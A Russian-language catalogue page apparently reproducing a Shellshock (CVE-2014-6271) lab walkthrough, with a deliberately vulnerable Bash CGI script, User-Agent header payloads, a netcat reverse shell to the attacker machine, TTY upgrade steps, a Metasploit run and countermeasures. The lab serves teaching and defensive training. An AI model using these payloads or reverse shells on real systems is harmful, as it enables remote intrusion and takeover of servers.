Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2014-6271-Shellshock- — Полная современная демонстрационная лаборатория для CVE-2014-6271 (Shellshock), включая архитектуру, шаги эксплуатации, использование Burp Suite, обратные оболочки, контрмеры и полную шпаргалку по командам. | Kitploit
Инструменты/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
Анализ уязвимостейЭксплуатацияОбратная инженерияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming
Разработка Полезной Нагрузки
Лаборатории и Практика
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

Полная современная демонстрационная лаборатория для CVE-2014-6271 (Shellshock), включая архитектуру, шаги эксплуатации, использование Burp Suite, обратные оболочки, контрмеры и полную шпаргалку по командам.

Репозиторий
49 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплуатация Shellshock (CVE-2014-6271): Полная, современная лаборатория для демонстрации

Shellshock (CVE-2014-6271) — одна из самых влиятельных уязвимостей удаленного выполнения кода, когда-либо обнаруженных. Дефект затрагивает Bash и позволяет злоумышленникам выполнять произвольные команды, просто внедряя специально crafted полезные нагрузки в переменные окружения.

Это руководство предоставляет полную, воспроизводимую демонстрацию с использованием:

  • Kali Linux (атакующий)
  • Metasploitable2 (цель)
  • curl, Burp Suite, Netcat
  • Собственноручно созданного CGI-скрипта на Bash

Оно предназначено для обучения, исследований, тренингов и повышения общей осведомленности в области кибербезопасности.


📌 Содержание

  1. Архитектура лаборатории
  2. Создание уязвимого CGI-скрипта
  3. Понимание уязвимости Shellshock
  4. Эксплуатация Shellshock с помощью curl
  5. Эксплуатация Shellshock с помощью Burp Suite
  • Обратная оболочка через Shellshock
  • Повышение до полностью интерактивного TTY
  • Диаграмма цепочки атаки
  • Галерея скриншотов
  • Контрмеры
  • Шпаргалка (все команды)
  • Эксплуатация Shellshock с помощью Metasploit
  • Заключение

  • 1. Архитектура лаборатории

    КомпонентРольОСIP-адресКлючевые службы
    Kali LinuxАтакующийKali Linux (последняя версия)192.168.1.4curl, Burp Suite, Netcat
    Metasploitable2Целевой уязвимый серверUbuntu Linux (MSF2)192.168.1.5Apache 2.2, CGI-скрипты, Bash
    Apache mod_cgiВыполнение скриптовРаботает на MSF2н/дПредоставляет Bash через CGI
    shellshock.shУязвимая точка входаCGI на Bashн/дОтображает переменные окружения

    Эта простая конфигурация из двух узлов отражает многие устаревшие развертывания, все еще присутствующие в промышленных системах и системах Интернета вещей.


    2. Создание уязвимого CGI-скрипта

    На Metasploitable2:

    root@kitploit:~
    sudo su
    cd /usr/lib/cgi-bin/
    
    cat << 'EOF' > shellshock.sh
    #!/bin/bash
    echo "Content-type: text/html"
    echo
    echo "<pre>"
    env
    echo "</pre>"
    EOF
    
    chmod +x shellshock.sh
    a2enmod cgi
    service apache2 restart
    

    Проверьте скрипт с Kali:

    root@kitploit:~
    curl http://192.168.1.5/cgi-bin/shellshock.sh
    

    Вы должны увидеть отображаемые переменные окружения.


    3. Понимание уязвимости Shellshock

    Shellshock возникает, когда Bash некорректно анализирует переменные окружения, напоминающие определения функций.

    Вредоносная переменная, например:

    root@kitploit:~
    () { :; }; /bin/bash -c "id"
    

    заставит Bash выполнить команду после определения функции — даже если сама функция никогда не вызывается.

    CGI-приложения особенно уязвимы, поскольку HTTP-заголовки автоматически передаются скриптам в качестве переменных окружения.


    4. Эксплуатация Shellshock с помощью curl

    root@kitploit:~
    curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
    http://192.168.1.5/cgi-bin/shellshock.sh
    

    Вывод должен включать:

    root@kitploit:~
    Vulnerable
    uid=33(www-data)
    

    Это подтверждает удаленное выполнение кода.


    5. Эксплуатация Shellshock с помощью Burp Suite

    5.1 Отправка обычного запроса

    Посетите:

    root@kitploit:~
    http://192.168.1.5/cgi-bin/shellshock.sh
    

    Отправьте запрос в Repeater.

    5.2 Внедрение полезной нагрузки Shellshock

    Замените заголовок User-Agent на:

    root@kitploit:~
    User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"
    

    5.3 Ответ

    Вы должны увидеть:

    root@kitploit:~
    BurpTest
    uid=33(www-data)
    

    Burp Suite наглядно и познавательно подтверждает уязвимость.


    6. Обратная оболочка через Shellshock

    Запустите слушатель на Kali:

    root@kitploit:~
    nc -lvnp 4444
    

    Запустите обратную оболочку через CGI-скрипт:

    root@kitploit:~
    curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
    http://192.168.1.5/cgi-bin/shellshock.sh
    

    Оболочка подключится обратно к Kali.


    7. Повышение до полностью интерактивного TTY

    Внутри обратной оболочки:

    root@kitploit:~
    python -c 'import pty; pty.spawn("/bin/bash")'
    export TERM=xterm
    

    Приостановите сессию:

    root@kitploit:~
    Ctrl + Z
    

    На Kali:

    root@kitploit:~
    stty raw -echo; fg
    

    Нажмите Enter.

    Теперь у вас есть:

    • автодополнение по Tab
    • клавиши со стрелками
    • управление заданиями
    • полностью интерактивный Bash

    8. Диаграмма цепочки атаки

    root@kitploit:~
              ┌────────────────────────┐
              │  Атакующий (Kali)      │
              │      192.168.1.4       │
              └───────────┬────────────┘
                          │
         1. Вредоносный HTTP-заголовок (Shellshock)
                          │
                          ▼
            ┌──────────────────────────┐
            │ Веб-сервер Apache (CGI)  │
            │     192.168.1.5          │
            └───────────┬──────────────┘
                        │
       2. Заголовок → Переменная окружения CGI
                        │
                        ▼
          ┌──────────────────────────┐
          │     Bash (Уязвимый)      │
          └───────────┬──────────────┘
                      │
          3. Внедренная команда выполняется
                      │
                      ▼
            ┌─────────────────────────┐
            │  Доступ оболочки www-data│
            └───────────┬─────────────┘
                        │
            4. Обратная оболочка → Kali
                        │
                        ▼
          ┌──────────────────────────┐
          │ Полностью интерактивный  │
          │ TTY                      │
          └──────────────────────────┘
    

    9. Галерея скриншотов

    Визуальное прохождение ключевых этапов атаки.

    ОписаниеИзображение
    Сканирование Nmap + вывод теста Shellshock
    Burp Suite – Исходный запрос Shellshock
    Burp Suite – Внедрение полезной нагрузки/заголовка
    Обратная оболочка, полученная на Kali (nc)

    10. Контрмеры

    ✔ 1. Обновление Bash

    Примените патч до версии, которая корректно обрабатывает разбор функций.

    ✔ 2. Отключение CGI

    Устаревший CGI вносит ненужный системный риск.

    ✔ 3. Очистка HTTP-заголовков

    Отбрасывайте подозрительные шаблоны, такие как:

    root@kitploit:~
    () { :; };
    

    ✔ 4. Использование принципа минимальных привилегий

    Ограничьте права пользователя веб-сервера (www-data).

    ✔ 5. Ограничения исходящих соединений

    Предотвращает обратные оболочки и утечку данных.

    ✔ 6. Развертывание межсетевого экрана веб-приложений (WAF)

    Современные сигнатуры WAF немедленно обнаруживают Shellshock.

    ✔ 7. Включение SELinux / AppArmor

    Ограничивает процессы Bash и блокирует непреднамеренное поведение.

    ✔ 8. Регулярное проведение сканирования уязвимостей

    Используйте такие инструменты, как:

    • Nessus
    • OpenVAS
    • Nikto
    • Nmap NSE (http-shellshock.nse)

    11. Шпаргалка (все команды)

    Настройка цели

    root@kitploit:~
    sudo su
    cd /usr/lib/cgi-bin/
    cat << 'EOF' > shellshock.sh
    #!/bin/bash
    echo "Content-type: text/html"
    echo
    echo "<pre>"
    env
    echo "</pre>"
    EOF
    chmod +x shellshock.sh
    a2enmod cgi
    service apache2 restart
    

    Тестирование CGI

    root@kitploit:~
    curl http://192.168.1.5/cgi-bin/shellshock.sh
    

    Тест Shellshock

    root@kitploit:~
    curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
    http://192.168.1.5/cgi-bin/shellshock.sh
    

    Обратная оболочка

    root@kitploit:~
    nc -lvnp 4444
    
    root@kitploit:~
    curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
    http://192.168.1.5/cgi-bin/shellshock.sh
    

    Повышение до полного TTY

    Внутри оболочки:

    root@kitploit:~
    python -c 'import pty; pty.spawn("/bin/bash")'
    export TERM=xterm
    

    Приостановка:

    root@kitploit:~
    Ctrl + Z
    

    На Kali:

    root@kitploit:~
    stty raw -echo; fg
    

    Нажмите Enter.


    12. Эксплуатация Shellshock с помощью Metasploit (msfconsole)

    Metasploit предоставляет профессиональный, автоматизированный способ эксплуатации Shellshock с использованием встроенного модуля:

    root@kitploit:~
    exploit/multi/http/apache_mod_cgi_bash_env_exec
    

    Этот метод быстр, надежен и предлагает автоматическую подготовку полезной нагрузки (например, Meterpreter).


    12.1 Запуск Metasploit

    root@kitploit:~
    msfconsole
    

    12.2 Поиск модулей Shellshock

    root@kitploit:~
    search shellshock
    

    Вы должны увидеть (среди прочего):

    root@kitploit:~
    exploit/multi/http/apache_mod_cgi_bash_env_exec  Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
    auxiliary/scanner/http/apache_mod_cgi_bash_env   Apache mod_cgi Bash Environment Variable Injection (Scanner)
    

    12.3 Загрузка модуля эксплойта

    root@kitploit:~
    use exploit/multi/http/apache_mod_cgi_bash_env_exec
    

    12.4 Настройка необходимых параметров

    Установите IP-адрес цели:

    root@kitploit:~
    set rhosts 192.168.1.5
    

    Установите путь к уязвимому CGI:

    root@kitploit:~
    set targeturi /cgi-bin/shellshock.sh
    

    Установите ваш IP-адрес Kali:

    root@kitploit:~
    set lhost 192.168.1.4
    

    При необходимости установите порт прослушивания:

    root@kitploit:~
    set lport 4444
    

    Проверьте:

    root@kitploit:~
    options
    

    Вы должны увидеть:

    root@kitploit:~
    RHOSTS     192.168.1.5
    TARGETURI  /cgi-bin/shellshock.sh
    LHOST      192.168.1.4
    LPORT      4444
    METHOD     GET
    HEADER     User-Agent
    CVE        CVE-2014-6271
    

    12.5 Запуск эксплойта

    root@kitploit:~
    run
    

    При успехе:

    root@kitploit:~
    [*] Started reverse TCP handler on 192.168.1.4:4444
    [*] Command Stager progress - 100.00%
    [*] Sending stage ...
    [*] Meterpreter session 1 opened ...
    

    12.6 Взаимодействие с сессией Meterpreter

    root@kitploit:~
    sessions -i 1
    

    Теперь у вас есть:

    root@kitploit:~
    meterpreter >
    

    12.7 Запуск обычной оболочки

    root@kitploit:~
    shell
    

    Затем:

    root@kitploit:~
    id
    hostname
    

    Ожидаемый результат:

    root@kitploit:~
    uid=33(www-data) gid=33(www-data)
    metasploitable
    

    Вы получили удаленное выполнение команд с помощью Metasploit и Shellshock.


    13. Заключение

    Эта демонстрация показывает, как Shellshock может быть эксплуатирован с помощью простой манипуляции HTTP-заголовками, обратных оболочек, выполнения CGI-скриптов и автоматизации Metasploit. Несмотря на возраст более десяти лет, Shellshock остается важным уроком в:

    • практике безопасной разработки ПО
    • очистке входных данных
    • рисках устаревших систем
    • методах пост-эксплуатации

    Сделано с большой любовью:
    Хайтам из Омана ❤️🇴🇲

    Скачать инструмент